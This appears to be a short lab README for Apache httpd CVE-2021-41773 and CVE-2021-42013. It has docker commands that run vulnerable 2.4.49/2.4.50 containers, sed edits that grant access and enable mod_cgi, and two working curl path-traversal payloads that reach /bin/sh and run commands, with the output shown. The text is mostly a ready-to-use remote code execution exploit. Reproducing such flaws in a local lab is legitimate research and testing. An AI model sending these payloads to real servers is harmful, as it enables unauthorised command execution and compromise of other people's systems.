cve-2021-41773

# Run vulnerable apache 2.4.49

docker run -dit --name cve2021-41773 -p 8080:80 -v  /opt/apache2.4.49:/usr/local/apache2/htdocs/ httpd:2.4.49

# Run vulnerable apache 2.4.50

docker run -dit --name cve2021-41773 -p 8080:80 -v  /opt/apache2.4.49:/usr/local/apache2/htdocs/ httpd:2.4.50

# Require all granted

docker exec -it cve2021-41773 sed -i "0,/denied/s/AllowOverride none/# AllowOverride None/" conf/httpd.conf
docker exec -it cve2021-41773 sed -i "0,/denied/s/denied/granted/"  conf/httpd.conf

# Mod-cgi enabled
docker exec -it cve2021-41773  sed -i 's,#\(LoadModule cgid_module modules/mod_cgi.so\),\1,g' /usr/local/apache2/conf/httpd.conf
docker exec -it cve2021-41773  sed -i 's,#\(LoadModule cgid_module modules/mod_cgid.so\),\1,g' /usr/local/apache2/conf/httpd.conf

# Restart apache
docker kill --signal="USR1" cve2021-41773

# CVE-2021-41773 PoC
    
$ curl --data "echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

# CVE-2021-42013 POC

$ curl 'http://127.0.0.1:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo; id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

References : 
https://twitter.com/roman_soft/status/1446252280597078024?s=21
https://gist.github.com/juananpe/7de0c6a405902dbd616b0753e2205533
https://twitter.com/snyff/status/1445592492183724041
https://twitter.com/leonjza/status/1445650538847039495